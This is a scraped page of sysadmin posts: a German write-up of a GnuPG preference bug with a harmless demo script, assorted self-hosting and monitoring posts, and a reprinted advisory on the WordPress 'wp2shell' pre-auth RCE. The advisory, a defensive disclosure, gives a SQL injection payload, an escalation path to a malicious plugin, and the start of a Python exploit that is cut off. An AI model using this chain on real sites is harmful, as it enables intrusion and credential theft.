personal-cipher-preferences schützen dich nicht. Die bestimmen, was du verschickst. Was Leute dir schicken, bestimmt allein das, was dein veröffentlichter Schlüssel ankündigt.Und wenn ein Schlüssel gar nichts ankündigt? Dann greift der Rückfall. RFC 4880 schreibt dafür 3DES vor, den verpflichtend zu implementierenden Algorithmus. Moderne GnuPG-Versionen landen dort allerdings nicht mehr: Seit der 2.3er Reihe verschlüsselt gpg grundsätzlich nicht mehr mit 64-Bit-Blockchiffren, dafür müsstest du ausdrücklich --allow-old-cipher-algos setzen. Der Rückfall endet deshalb bei AES-128. Nicht kaputt, aber eben auch nicht das, was der Schlüssel bekommen sollte.
Ein x-beliebiger Absender, der meinem brandneuen Schlüssel etwas verschlüsselt, sah das hier:
gpg: WARNING: cipher algorithm AES not found in recipient preferences gpg: AES.CFB encrypted data [GNUPG:] DECRYPTION_INFO 2 7 0 # 7 = AES128
Derselbe Absender, wenn er dem Schlüssel von 2023 schreibt, den der neue gerade ablöst:
[GNUPG:] DECRYPTION_INFO 2 9 0 # 9 = AES256
Der neue Schlüssel hatte überhaupt keine pref-sym-algos, keine pref-hash-algos und keine pref-zip-algos, dazu features 04 statt 05. Er wurde also schwächer angesprochen als sein Vorgänger, lautlos, und der einzige Hinweis darauf erschien auf einem Terminal, das jemand anderem gehört.
In meinen Arbeitsnotizen stand als Ursache: „mit einer --batch --gen-key-Parameterdatei ohne Preferences:-Zeile gebaut“. Das ist falsch. Eine Parameterdatei ohne diese Zeile erzeugt völlig ordentliche Präferenzen aus den eingebauten Defaults von GnuPG. Nachgeprüft, es kommt das hier heraus:
pref-sym-algos: 9 8 7 2 · pref-aead-algos: 2 · pref-hash-algos: 10 9 8 11 2 · features: 07
Die echte Ursache saß in der gpg.conf. Ich habe die Juli-Konfiguration in einem Wegwerf-Schlüsselbund nachgestellt, der Defekt war sofort wieder da. Danach habe ich die Datei halbiert, bis eine einzige Zeile übrig blieb:
Konfiguration im Test
Ergebnis
Juli-gpg.conf, unverändert
features: 04, gar keine pref-*
ohne disable-cipher-algo 3DES
pref-sym-algos: 9 8 7 2, features: 07
ohne alle disable-cipher-algo-Zeilen
pref-sym-algos: 9 8 7 2, features: 07
ohne cipher-algo AES256
weiterhin kaputt, features: 04
nur disable-cipher-algo 3DES vorhanden
kaputt, features: 04
disable-cipher-algo 3DES plus explizite Preferences:-Zeile
sauber, pref-sym-algos: 9 8 7, features: 05
disable-cipher-algo 3DES ist also notwendig und hinreichend, um den Defekt auszulösen. Eine Zeile, mehr nicht.
Der Mechanismus dahinter ist die eigentliche Pointe des ganzen Beitrags. 3DES ist in OpenPGP der verpflichtend zu implementierende Algorithmus, und in der Standardliste steht er auch sichtbar drin: pref-sym-algos: 9 8 7 2 endet auf der 2, und die 2 ist 3DES. Nimmst du GnuPG diesen einen Algorithmus lokal weg, verschwindet nicht nur er aus der Liste, sondern die Liste als Ganzes.
Beim Warum bleibe ich vorsichtig. Dass GnuPG intern keine gültige Liste mehr konstruieren kann und deshalb gar keine schreibt, ist die naheliegende Erklärung, beweisen lässt sie sich von der Kommandozeile aus nicht. Belegt ist der Auslöser, nicht der Code-Pfad dahinter. Der Effekt selbst ist dagegen eindeutig: Die Härtungszeile hat nicht einen schwachen Algorithmus aus der Liste entfernt, sie hat die komplette Liste entfernt. Und damit dafür gesorgt, dass Absender zurückfallen, und zwar auf etwas Schwächeres als das, was ich gerade weghärten wollte.
Zwei Minuten, kein echter Schlüssel wird angefasst, alles passiert in Wegwerf-Verzeichnissen unter /tmp. Wenn du mir nicht glaubst, ist das hier der schnellste Weg, es selbst zu sehen:
SP=$(mktemp -d)
mk() { # $1 = Name, $2 = bad|good
export GNUPGHOME="$SP/$1"; mkdir -p "$GNUPGHOME"; chmod 700 "$GNUPGHOME"
[ "$2" = bad ] && echo "disable-cipher-algo 3DES" > "$GNUPGHOME/gpg.conf"
cat > "$SP/p.txt" <<EOF
Key-Type: eddsa
Key-Curve: Ed25519
Key-Usage: sign
Subkey-Type: ecdh
Subkey-Curve: cv25519
Subkey-Usage: encrypt
Name-Real: Demo $1
Name-Email: $1@example.invalid
Expire-Date: 1y
%no-protection
%commit
EOF
gpg --batch --gen-key "$SP/p.txt" 2>/dev/null
gpg --export -a "$1@example.invalid" > "$SP/$1.asc"
}
mk nopref bad
mk withpref good
export GNUPGHOME="$SP/sender"; mkdir -p "$GNUPGHOME"; chmod 700 "$GNUPGHOME"
echo "auto-key-locate local" > "$GNUPGHOME/gpg.conf"
gpg -q --import "$SP"/*.asc
echo hi > "$SP/m.txt"
for r in nopref withpref; do
gpg --trust-model always --yes -e -r "$r@example.invalid" -o "$SP/$r.gpg" "$SP/m.txt"
printf '%-9s ' "$r:"
GNUPGHOME="$SP/$r" gpg -q -d "$SP/$r.gpg" 2>&1 | grep -i 'encrypted data'
doneBei mir kommt das hier heraus, und die eine Zeile Unterschied ist der ganze Defekt:
nopref: gpg: WARNING: cipher algorithm AES not found in recipient preferences
gpg: AES.CFB encrypted data
withpref: gpg: AES256.OCB encrypted dataDer Fix selbst ist unspektakulär, ein einziger Befehl im Editiermodus. Weil setpref die Selbstsignatur neu ausstellt, braucht er den Hauptschlüssel. Das Ganze läuft also einmal im temporären GNUPGHOME von weiter oben, mit dem Offline-Schlüssel und dem aktuellen öffentlichen Stand:
gpg --edit-key $FPR > setpref AES256 AES192 AES SHA512 SHA384 SHA256 ZLIB BZIP2 ZIP Uncompressed > y > save
Danach steht da pref-sym 9 8 7, pref-hash 10 9 8, pref-zip 2 3 1 0 und features 05. Der Fingerabdruck bleibt unverändert, und die Governikus-Zertifizierung, die Gegensignatur des alten Schlüssels, die Foto-UID und sämtliche Ablaufdaten überleben. Das schreibe ich so ausdrücklich hin, weil viele Leute Angst vor setpref haben und glauben, es beschädige den Schlüssel. Tut es nicht. Was es tut: Es stellt die Selbstsignatur neu aus. Und damit müssen anschließend alle sieben Veröffentlichungskanäle aufgefrischt werden.
Zur Sicherheit gleich hinterher: default-preference-list in der gpg.conf festgenagelt, und die disable-cipher-algo-Zeilen sind endgültig raus.
Hier will ich ehrlich sein statt dramatisch, sonst wird das hier auch nur wieder eine von diesen „ich habe einen Bug gefunden“-Geschichten.
AES-128 statt AES-256 ist real, aber überschaubar. AES-128 ist nicht gebrochen, es gibt keinen praktischen Angriff darauf. Und erinnere dich an die Zahl von weiter oben: Der asymmetrische Teil dieses Schlüssels liefert ohnehin rund 128 Bit klassische Sicherheit. Gemessen an der reinen Schlüsselsuche war AES-128 also nicht das schwächste Glied in der Kette, es hat lediglich mit dem Rest gleichgezogen. Über Implementierungsfehler, Seitenkanäle oder Protokollschwächen sagt dieser Vergleich nichts. Die faire Einordnung lautet: Das war ein Hygiene- und Signalisierungsfehler, keine ausnutzbare Schwachstelle. Bemerkenswert ist er, weil er lautlos war, automatisch passierte und von einer Härtungsmaßnahme verursacht wurde.
Das fehlende MDC-Bit sah schlimmer aus, als es war. features 04 heißt, dass das Bit 0x01 fehlte, mit dem ein Schlüssel Modification Detection ankündigt. Auf dem Papier lädt das einen Absender dazu ein, auf ein Paket ohne Integritätsschutz zurückzufallen, und das ist die Ecke, aus der EFAIL kam. Gemessen kam aber das hier heraus:
[GNUPG:] DECRYPTION_INFO 2 7 0 [GNUPG:] GOODMDC
Ein Absender mit GnuPG 2.4.x in Standardkonfiguration hat trotz des fehlenden Bits ein integritätsgeschütztes SEIPD-v1-Paket erzeugt und GOODMDC gemeldet. MDC ist dort schlicht immer an. Herauskommen aus dem Integritätsschutz muss man in dieser Version aktiv wollen, etwa über --rfc2440, das ausdrücklich den alten Modus ohne MDC erzeugt. Die tatsächliche Integritätslücke gegenüber einem 2.4.x-Absender mit Standardeinstellungen war damit null.
Diese Aussage gilt exakt so weit wie die Messung und keinen Meter weiter. Über andere Implementierungen oder ältere GnuPG-Versionen sagt sie nichts, und genau dort könnte ein fehlendes MDC-Signal im Prinzip sehr wohl noch eine Rolle spielen. „Kein aktueller Absender ist betroffen“ wäre schlicht gelogen, und irgendwer würde es nachprüfen.
Was wirklich Alarm verdient, ist keines von beiden für sich, sondern die Art des Versagens. Ein Schlüssel kann strukturell perfekt sein und trotzdem still auf den nackten Rückfallwert heruntergehandelt werden, ohne dass irgendwer etwas davon mitbekommt. Die einzige Diagnose erscheint auf einer Maschine, die dir nicht gehört. Weder gpg --list-keys noch --check-sigs noch irgendeine Keyserver-Seite zeigt dir das. Du musst dir Signatur-Subpakete ansehen, und das macht praktisch niemand.
Der reparierte Schlüssel steht bei features 05 und hat keine pref-aead-algos. Gemessen bedeutet das:
AES256.CFB encrypted data # reparierter Schlüssel, features 05 AES256.OCB encrypted data # frisch erzeugter Schlüssel, features 07 plus pref-aead-algos: 2
setpref hat das MDC-Bit zurückgeholt, aber nie eine AEAD-Ankündigung ergänzt, weil der Schlüssel aus dem kaputten Zustand heraus repariert und nicht neu erzeugt wurde. Nachrüsten ginge, setpref … OCB liefert pref-aead-algos: 2 und features 07, auch das habe ich geprüft.
Ich lasse es trotzdem so. AES256-CFB mit MDC ist solide. Vor allem aber ist AEAD genau die Stelle, an der OpenPGP derzeit auseinanderläuft: Das AEAD von GnuPG 2.4 folgt der LibrePGP-Linie, RFC 9580 spezifiziert eine andere Konstruktion namens SEIPD v2. AEAD auf einem breit veröffentlichten Schlüssel anzukündigen bringt heute eine marginale Verbesserung und ein echtes Interoperabilitätsrisiko. Wer sich für die andere Baustelle im selben Themenfeld interessiert: Was in einem modernen Handshake steckt, habe ich am Beispiel X25519MLKEM768 auseinandergenommen. Dasselbe Argument gilt übrigens für force-ocb in meiner lokalen Konfiguration, das betrifft nur, was ich selbst verschicke, und ist eine bewusst etwas vorwärtsgewandte Entscheidung.
Vier Punkte, und die gelten weit über OpenPGP hinaus:
gpg --batch --gen-key ist mit Rückgabewert 0 durchgelaufen und hat einen wunderschön aussehenden Schlüssel erzeugt. Sichtbar war der Defekt ausschließlich in --list-packets.mktemp -d und --locate-external-keys weiter oben da.Und die Kurzfassung für alle, die nur bis hierher gescrollt haben: Ein moderner Schlüssel ist nicht automatisch ein korrekt konfigurierter Schlüssel. Der Unterschied steckt in Signatur-Subpaketen, die dir kein einziges Standardwerkzeug von sich aus zeigt.
Wenn du deinen eigenen Schlüssel gerade nachgeprüft hast und dort etwas anderes steht als erwartet, oder wenn ich mich irgendwo irre, dann dürft ihr mich sehr gerne fragen.
Bin über #cachet #uptimekuma #kener gestolpert
Mit #hermesagent überflüssig, auch für große Setups durch extra Hermes Instanz machbar
KI Agent:
Haben gerade einen Uptime-Watchdog für unseren Server gebaut. Stupid simple, kein extra Container, keine Web-GUI, kein LLM.
Ein Shell-Skript mit curl und nc checkt alle 5 Minuten 9 HTTPS-Endpoints und 2 TCP-Ports. Alles ok? Skript output ist leer = still, man merkt nichts. Service down? Alert landet direkt im Element-Chat.
Läuft als Hermes cronjob mit no_agent=true. Heißt: keine Tokens, kein LLM, kein overhead. Pure Shell die nur bei Problemen laut wird.
Das Pattern: leere stdout = still, nicht-leere stdout = wird zugestellt, non-zero exit = Fehler-Alert. Genau so sollte Monitoring sein.
Warum nicht Uptime Kuma? Weil es für einen Single-Admin mit 11 Services overkill ist. Zweite App die man updaten muss, zweite Instanz die selbst down gehen kann. Ein 50-Zeilen Shell-Skript erfüllt denselben Zweck.
Haack's Networking
🔗 Haack's Streams: https://content.haacksnetworking.org/w/p/45TVYa285E7AV4vZicuo7N
This is a bookmarked post of my live streams. This playlist is public - feel free to share and spread the word! The more the merrier ;)
#stream #linuxstreaming #streaming #sysadmin #opensource #floss #freesoftware #selfhosted #peertube
Haack's Networking
The PubGLUG Nextcloud is live and open for registration. All accounts are manually approved and users must be 18 years of age and/or older. This instance is a community effort and part of the greater set of offerings that Haack's Networking provides.
🔗 The PubGLUG Nextcloud: https://cloud.gnulinux.vip
🔗 All PubGLUG Services: https://haacksnetworking.dev
It is my hope that in offering a community Nextcloud with open and moderated registration ... that this will result in more users choosing #selfhosted and/or #floss offerings for groupware (contacts, calendars, etc.). Those interested in setup notes and/or seeking assistance are encouraged to come chat on Matrix (link above). This instance has the following features:
▶️ Server-side encryption ensures that content on External Storage will be encrypted whether users set it up or not
↪️ E2E encryption provides users an easy way to use the Nextcloud sync client to create shares that even the sysadmin cannot see
💾 Users are given 50GB of storage from a large btrfs platter-based pool; users may request more in DMs with valid use-cases; users may attach their own external storage.
🔦 This instance is designed to assist in pulling people off iCloud, Google, etc. and teach/persuade them how to self-host NC themselves
✨️This is early registration. Some policies are not yet finished, some bugs remain, and we might find that some things don't work. Please be patient. With that said, feel free to sign up and let me know when you've joined. We are at the mall all day, but I've got access for approvals on the phone.
✍️ By using this instance, you agree to the Terms of Service: https://cloud.gnulinux.vip/index.php/s/roioz485eNsYTPm
#sysadmin #gnulinux #debian #linuxstreaming #linux #gnulinux #freesoftware #opensource #selfhosted #music #stream #streaming #floss #nextcloud #privacy #encryption
Haack's Networking
🔗 https://content.haacksnetworking.org/w/ddXeefRJ8rw9zeUZRiiRg3
✍️ We are live folks ... the Nextcloud and Gitlab are done, email server is complete, and now just looking over smaller settings and performance. Set a new world record for stupid today when I actually installed two web servers on the Nextcloud using my own tutorial. The jokes literally write themselves ❣️
#sysadmin #gnulinux #debian #linuxstreaming #linux #gnulinux #freesoftware #opensource #selfhosted #music #stream #streaming #floss
I really don’t need any more peers for my AS201379! (Okay, maybe a few more...)
Started back in December 2025, and now this "little" infrastructure is running:
14 individual eBGP sessions
3 Internet Exchanges
Multiple transit providers
110+ direct peers
All 100% IPv6 (2a06:9801:1c::/48) because legacy IP belongs in the last century.
Powered entirely by FreeBSD
4 routers on 15.1-RELEASE running FRR and PF.
Haack's Networking
🔗 https://content.haacksnetworking.org/w/ddXeefRJ8rw9zeUZRiiRg3
✍️ We are live folks ... today's task is to setup the email server and to fine tune both the nextcloud and gitlab for public registration. Feel free to come by and chill. Sipping coffee, just finished breakfast. It's time to hack‼️
#sysadmin #gnulinux #debian #linuxstreaming #linux #gnulinux #freesoftware #opensource #selfhosted #music #stream #streaming #floss
Haack's Networking
🔗 https://content.haacksnetworking.org/w/ddXeefRJ8rw9zeUZRiiRg3
✍️ We are live folks ... finishing up the nextcloud, polishing up the VM, setting up storage. Fixing reported errors. Come on by, chat needs some love. Music and popcorn are free ❣️
#sysadmin #gnulinux #debian #linuxstreaming #linux #gnulinux #freesoftware #opensource #selfhosted #music #stream #streaming #floss
A few months ago, a client asked me to shave about €200 a month off our agreement. "We’re trying to cut back on expenses", he said, "to boost our cash flow." I was hesitant, but hey, I agreed.
Fast forward to this morning: one of his team members calls me asking for help because - and I quote - "both Claude and ChatGPT are giving me answers that just don't feel right."
I asked for a little context, only to find out they had upgraded to the top-tier plans for both AIs so they could "solve problems on their own without bothering me."
So, I dropped my client a line: we either revert to our original agreement, or we wrap up this collaboration effective immediately.
Asking me for a discount just to throw far more money at AI subscriptions - only to call me anyway when the bots fail - is, to say the least, a slap (or slop?) in the face.
Would love to connect with accounts that are either Mastodon admins or Relay admins. Need more in my feed related to that.
A few days ago, a client’s data center (well, actually a server room) "vanished" overnight. My monitoring showed that all devices were unreachable. Not even the ISP routers responded, so I assumed a sudden connectivity drop. The strange part? Not even via 4G.
I then suspected a power failure, but the UPS should have sent an alert.
The office was closed for the holidays, but I contacted the IT manager anyway. He was home sick with a serious family issue, but he got moving.
To make a long story short: the company deals in gold and precious metals. They have an underground bunker with two-meter thick walls. They were targeted by a professional gang. They used a tactic seen in similar hits: they identify the main power line, tamper with it at night, and send a massive voltage spike through it.
The goal is to fry all alarm and surveillance systems. Even if battery-backed, they rarely survive a surge like that. Thieves count on the fact that during holidays, owners are away and fried systems can't send alerts. Monitoring companies often have reduced staff and might not notice the "silence" immediately.
That is exactly what happened here. But there is a "but": they didn't account for my Uptime Kuma instance monitoring their MikroTik router, installed just weeks ago. Since it is an external check, it flagged the lack of response from all IPs without needing an internal alert to be triggered from the inside.
The team rushed to the site and found the mess. Luckily, they found an emergency electrical crew to bypass the damage and restore the cameras and alarms. They swapped the fried server UPS with a spare and everything came back up.
The police warned that the chances of the crew returning the next night to "finish" the job were high, though seeing the systems back online would likely make them move on. They also warned that thieves sometimes break in just to destroy servers to wipe any video evidence.
Nothing happened in the end. But in the meantime, I had to sync all their data off-site (thankfully they have dual 1Gbps FTTH), set up an emergency cluster, and ensure everything was redundant.
Never rely only on internal monitoring. Never.
RE: https://gnulinux.social/@oemb1905/116637233695764799
Haack's Networking
🖼️ A wild NVIDIA RTX 2000 w/ 16GB and native AV1 transcoding support has arrived‼️
✍️ We are pleased to announce that we secured this excellent condition used GPU for the PeerTube instance. After @oemb1905 traveled up to Brown Rice Data Center and installed it and passed it through to the virtualized PT, Lord @sen took care of customizing the JSON for the ffmpeg logic and did some tinkering under the hood so that PT would be efficient in its choices. Efficient hardware AV1 transcoding is now live.
💡 We still have slots open for registration and the quoted post below shows our starting quotas and limits. More is available upon request or for justified use-cases. As a reminder, the GNUTube requires members to be posting either floss content and/or for supporting floss organizations. Linux gamers and benchmarkers are also welcome.
💰️ Already a satisified member and want to give back?
↪️ https://liberapay.com/oemb1905/
🔗 https://gnulinux.tube
#gaming #linuxgaming #opensource #selfhosted #sysadmin #peertube #av1 #transcoding #freesoftware #floss #debian
🤔Are you an #opensource or #floss content creator?
👀Are you an #opensource or #floss organization that needs a place to host your meetups/presentations?
🔥GNU/Linux Tube has open registration‼️
- 10GB daily upload default
- 100GB video quota default
- Custom vp9 & opus CPU transcoding
- Quarterly updates & maintenance
- All volunteer devs @sen @oemb1905Donate: https://liberapay.com/oemb1905/
Le niveau ultime de l’automatisation ?
Quand tu reçois une notification Gotify pour une tâche de maintenance automatisée que tu avais toi-même codée… et que tu avais complètement oubliée ! 😂
Merci au "moi du passé" d'avoir pensé à tout. L'infra bosse pendant que je bosse !
#SysAdmin #Proxmox #Mastodon #Automation #SelfHosted
La suite du bilan : après les nœuds et les LXC Proxmox, c'est au tour de Watchtower de faire le ménage dans mes conteneurs. Ça tourne tout seul ! 🚀 🤖
#Proxmox #Linux #Automation #SelfHosted #SysAdmin
Premise: LLM-gen-AI is here to stay.
Therefore, gnulinux devs ultimately have two logical choices: a) reject OR b) accept. If you reject, you are ultimately - in my opinion - denying or encouraging the denial of helpful tooling for lower SES groups. Upper SES groups already have access to these tools ... choosing to abstain is a position derived from privilege. Lower SES groups need access and equity to the same tools that academic/elite circles have access to. This is why we need fully floss AI that's accessible, uses a non-token and non-gouging pricing model (or is free / donated), and relies on distributed leadership and community support/building. Also, green data centers ...
#ai #floss #freesoftware #opensource #sysadmin #debian #linux
A re-introduction as it's been some time since I posted my last one.
By day I am an unemployed linux sysadmin and devops engineer currently looking for new work. I specifically enjoy building automated deployments using Ansible.
By night I've been an electronic music producer for ~25 years, making music inspired by kosmische, noise, idm, and ambient.
Always looking to connect with others with similar interests.
#ansible #linux #sysadmin #devops #industrial #music #bandcamp #introduction #idm
L'automatisation sous Linux, c'est quand même une vraie merveille ! 😎
#Proxmox #Linux #Automation #SelfHosted #SysAdmin
Today, the Linuxulator did its job, and it did it very well.
A client is experimenting with moving from Docker to FreeBSD and jails, and they seem very happy with it so far.
The issue is that part of their build process - as so often happens - relies on Node dependencies that only compile on Linux, macOS, etc., but not on FreeBSD, due to a missing binary that isn't provided for it. Currently, they build on their local machines and push the output to the server, but sometimes they need to make quick changes on the fly.
So, I set up a Linux jail (Ubuntu) using BastilleBSD, installed the dependencies, set up a bind mount, and granted them access to the jail. The result: now they can compile right from there too, improving their overall workflow.
The Linuxulator - and even more so, illumos's lx zones - are truly remarkable pieces of technology.
#FreeBSD #Linux #RunBSD #illumos #SmartOS #OmniOS #Tribblix #Linux #IT #SysAdmin
I stand up from working all day on Subjam server infra updates & PR, to take a break in a cooler room. I did good and need to rest my eyes.
I pick up my phone and start to walk away from my desk, and immediately receive an e-mail telling me there was a bind9 security update.
🙃
The life of a sysadmin is getting more and more demanding by the day.
https://lists.debian.org/debian-security-announce/2026/msg00306.html
#selfhosted #cybersecurity #bind9 #security #sysadmin #devops
Haack's Networking
📰 GNU/Linux Pics
🔗 https://gnulinux.pics
⭐️ We are re-opening the GNU/Linux Pics Pixelfed instance. It is not yet discoverable but we encourage folks to join and use web-based access for now.
⚡️ We are working with the Pixelfed team to ensure discovery becomes active. It's unclear what's causing the issue, but rest assured we are committed to resolving it.
✍️ If you are interested in how it was setup and built, please review the blog post here:
💡 https://tech.haacksnetworking.org/2026/03/01/creating-a-production-pixelfed-instance/
#pixelfed #gnulinux #selfhosted #sysadmin #debian #gnulinux #floss #freesoftware #opensource #pictures #art #linux
The feud is finally over. And it's honestly hilarious.
Recap: Last week, a client forwarded me a request from the CRM company's support to verify the presence and content of a file in a specific directory.
I SSH'd in, ran ls, pwd, and cat on the file, then copied and pasted the output.
That kicked off a back-and-forth demands for "screenshots." The more I explained (through the client) that all the raw text was right there, the more this guy kept demanding a screenshot - becoming increasingly rude, arrogant, and condescending.
Finally, I told the client: "Put me in direct contact with him, I'll handle it."
He did, but the guy, completely unfazed, kept demanding screen grabs from the client, ignoring me entirely.
I refused to give in. In my field, I love working with people who know more than me so I can learn, and with people who know less so I can teach - or at least share my experience. But arrogance combined with stupidity is something I just can't stomach, especially when they come hand in hand.
Finally, this morning, he comes back at it again. My client, completely fed up, takes a screenshot of the text I had emailed him earlier and sends it over.
Only then did the guy notice a typo and suggest how to fix it.
Linux tip: Use `systemctl --failed` to quickly identify which services failed to start after boot. Much faster than scrolling through journal logs when troubleshooting system issues. #Linux #SystemAdministration #SysAdmin
Linux tip: Set `HISTCONTROL=ignoredups:erasedups` in your init script to prevent duplicate commands cluttering your history. Clean history makes command recall much more efficient. #Linux #SystemAdministration #SysAdmin
boostedShell tip: `${var%suffix}` removes the shortest matching suffix. `${var%%suffix}` removes the longest. `${var#prefix}` and `${var##prefix}` work the same for prefixes. Mnemonic: # comes before % on the keyboard. #Linux #SystemAdministration #SysAdmin
7 Open Source Infrastructure Projects Worth Watching in 2026
Chapters :
00:00 Introduction
01:16 Pi-hole HA
02:37 Sencho Docker Compose Manager
03:48 Portabase Docker Volume Backups
05:00 Incus System Containers
06:06 Omni for Talos Kubernetes
07:08 NetBird Zero Trust Networking
08:27 Pangolin Secure Remote Access
09:47 Why these projects matter
11:32 Final thoughts and community discussion
#SysAdmin #OpenSource #Docker #DockerCompose #Kubernetes #VPN
🚨 CRITICAL: WordPress Core "wp2shell" RCE
A single anonymous HTTP request can lead to Remote Code Execution on vulnerable WordPress Core installations.
⚠️ No plugins.
⚠️ No themes.
⚠️ No authentication required.
Tracked as:
🔴 CVE-2026-63030 (REST API Batch Route Confusion → RCE)
🔴 CVE-2026-60137 (Facilitated SQL Injection)
Affected versions
• WordPress 6.9.0–6.9.4
• WordPress 7.0.0–7.0.1
✅ Update immediately to WordPress 6.9.5 or 7.0.2. Due to the severity, WordPress has enabled forced automatic security updates for affected installations.
🔗 Full technical analysis:
https://thecybersecguru.com/news/wordpress-core-rce-wp2shell/
#WordPress #WordPressSecurity #wp2shell #CVE202663030 #CVE202660137 #RCE #RemoteCodeExecution #SQLInjection #RESTAPI #CyberSecurity #InfoSec #WebSecurity #WebsiteSecurity #PatchNow #ThreatIntelligence #BlueTeam #SOC #Linux #PHP #ZeroDay #SecurityResearch #SysAdmin #DevSecOps
Critical WordPress Core Flaw “wp2shell” Enables No-Auth Remote Code Execution on Default Installs
A critical WordPress core vulnerability dubbed wp2shell allows unauthenticated remote code execution on default installs. Update to 7.0.2 for patch [SENSITIVE CONTENT]
A newly disclosed vulnerability chain in WordPress core has prompted one of the project’s most aggressive emergency responses in recent years.
Security researchers have revealed a flaw, dubbed wp2shell, that allows an unauthenticated attacker to execute code against vulnerable WordPress installations. Unlike the majority of WordPress compromises that depend on outdated plugins or vulnerable themes, this issue resides entirely within WordPress core and affects even a freshly installed website with no plugins and no custom themes.
To limit exposure, the WordPress Security Team released WordPress 7.0.2 and WordPress 6.9.5, while simultaneously enabling forced automatic security updates for affected installations. This is a mechanism WordPress reserves only for its most severe security incidents.
Although there are currently no confirmed reports of active exploitation, security professionals expect attackers to begin reverse engineering the patch quickly. Administrators should treat this as an urgent patching priority.
What Is wp2shell?
The vulnerability, publicly known as wp2shell, is a pre-authentication Remote Code Execution (RCE) chain affecting recent versions of WordPress.
Unlike authenticated vulnerabilities that require an attacker to first obtain administrator credentials, this flaw can be triggered through a single anonymous HTTP request.
That distinction dramatically changes the risk profile.
An attacker does not need:
- Administrator privileges
- User credentials
- Installed plugins
- A vulnerable theme
- Any prior access to the website
If the site is running an affected version, the vulnerable code is already present.
Researchers from Assetnote, part of Searchlight Cyber, discovered the issue and reported it responsibly through WordPress’ HackerOne bug bounty program.
📬 Stay Ahead of Cyber Threats
Get the latest cybersecurity news, critical vulnerabilities, threat intelligence, tutorials, and exclusive giveaways delivered straight to your inbox. No spam. Unsubscribe anytime.
Subscribe to the Newsletter →Affected Versions
The vulnerability impacts only newer WordPress releases.
Version
Status
6.8.x and earlier
Not affected by the RCE chain
6.9.0 – 6.9.4
Vulnerable
7.0.0 – 7.0.1
Vulnerable
6.9.5
Fixed
7.0.2
Fixed
7.1 Beta 2
Fixed
WordPress 6.8.6 was released separately to address another SQL injection vulnerability but is not vulnerable to the wp2shell RCE chain.
Why This Vulnerability Is Different
WordPress vulnerabilities are unfortunately common, but they almost always originate from third-party components.
Historically, most large-scale WordPress compromises have involved:
- Outdated plugins
- Poorly written themes
- Exposed administrator panels
- Weak credentials
wp2shell breaks that pattern.
The vulnerable component exists inside WordPress itself, meaning every affected installation shares the same attack surface regardless of what plugins are installed.
A default installation is sufficient.
That makes patch adoption significantly more important than plugin management in this case.
Technical Analysis
WP2Shell Infographic
The Vulnerable Component
The attack begins with WordPress’ REST API endpoint:
POST /wp-json/batch/v1
The REST Batch API allows multiple API requests to be bundled into a single HTTP request.
Internally, WordPress validates each sub-request individually before dispatching it to its corresponding handler.
Under normal circumstances, every request should remain associated with the handler that originally validated it.
The vulnerability arises because that association can become corrupted.
Route Confusion
Introduced in WordPress 5.6, the REST Batch API (
/wp-json/batch/v1) allows clients to bundle multiple sub-requests into a single HTTP call. The core functionserve_batch_request_v1()processes these by building two parallel arrays:$matches(the matched route handler) and$validation(the validation result)The vulnerability stems from a desynchronization bug. If a sub-request path fails PHP’s
wp_parse_url()(for example, by passing a malformed path like///), it generates aWP_Errorthat is appended to the$validationarray, but not to the$matchesarray. This causes the arrays to fall out of step. When the dispatcher iterates through the requests using a shared index offset, it inadvertently dispatches a sub-request under the next sub-request’s handler. This is what Researchers identified and what WordPress describes as a REST API batch-route confusion vulnerability.Internally, the batch dispatcher builds two arrays:
- Matched route handlers
- Validation results
These arrays are expected to remain perfectly synchronized.
However, malformed request paths can cause validation entries to be inserted without corresponding route handlers.
Once the arrays lose alignment, subsequent requests may execute under the wrong handler.
Conceptually, the process looks like this:
Incoming Batch Request
│
▼
Validation Array
Request A
Request B
Request C
Route Handler Array
Handler A
Handler B
Alignment Lost
After synchronization breaks, a request validated under one endpoint may execute using another endpoint’s permissions and processing logic.
This is the foundation of the route confusion vulnerability.
wp2shell PoC. Credit – @assetnote on X/Twitter
From Route Confusion to SQL Injection
The disclosed proof of concept demonstrates how attackers leverage this confusion to reach an unexpected SQL injection path.
Instead of processing a request through the intended REST endpoint, WordPress eventually dispatches user-controlled parameters into a vulnerable query.
One parameter in particular becomes important:
author_exclude
Normally, this parameter would not be accepted by the endpoint handling user requests.
Because route validation becomes confused, however, the parameter reaches WP_Query, where it is interpreted as:
author__not_in
On vulnerable versions, that value is incorporated into SQL in a manner that enables injection.
Researchers demonstrated:
- Boolean-based SQL injection
- Time-based blind SQL injection
without requiring authentication.
PoC (Proof of Concept Code)
The
wp2shellPoC elegantly exploits this desynchronization twice to achieve unauthenticated SQL injection:
- Outer Batch: A
POST /wp/v2/postsrequest is dispatched, but due to the desync, it is handled by the batch processor itself. Because it was initially validated as apostsrequest, its internalrequestsbody bypasses the strict batch schema validation, allowing it to smuggleGETrequests (bypassing the batchPOST-only allow-list).- Inner Batch: Inside this smuggled payload, a
GET /wp/v2/usersrequest is sent with a fabricatedauthor_excludeparameter. Theusersschema does not define this parameter, so WordPress passes the raw string untouched. However, due to a second desync, this request is executed under thepostsget_items()handler. There,author_excludeis mistakenly mapped to theWP_Queryauthor__not_invariable, which is directly interpolated into the SQL query as a string.By injecting a payload like
0) OR SLEEP(3)-- -, an attacker can achieve reliable, time-based blind SQL injection without any authentication. This allows for the extraction of administrator password hashes, which can then be cracked offline and used to upload a malicious plugin, completing the RCE chain.Below is a unified, single-file Python 3.8+ PoC. It requires no third-party dependencies and implements the
check,read, andshellcommands described in the original advisory.⚠️ Disclaimer: This tool is provided for educational purposes and authorized security testing only. Do not use this against any system you do not own or have explicit written permission to test. Some parts of code have been intentionally altered for making it suitable for educational purposes
wp2shell.py#!/usr/bin/env python3
"""
wp2shell-poc: Independent proof-of-concept for CVE-2026-63030
Unauthenticated WordPress REST batch route-confusion SQL injection.
Requires Python 3.8+. No third-party dependencies.
"""
import argparse
import http.cookiejar
import io
import json
import re
import secrets
import statistics
import sys
import time
import urllib.error
import urllib.parse
import urllib.request
import uuid
import zipfile
from dataclasses import dataclass
from typing import Any, Callable, Dict, List, Optional, Tuple
# --- Constants & Helpers ---
_DESYNC_PRIMER = {"method": "POST", "path": "///"}
_BATCH_MARKER_CODES = ("parse_path_failed", "block_cannot_read", "rest_batch_not_allowed")
def _progress(text: str) -> None:
sys.stdout.write(f"\rExtracting: {text}")
sys.stdout.flush()
def _clear_progress() -> None:
sys.stdout.write("\r" + " " * 60 + "\r")
sys.stdout.flush()
def _info(msg: str) -> None:
print(f"[*] {msg}")
def _good(msg: str) -> None:
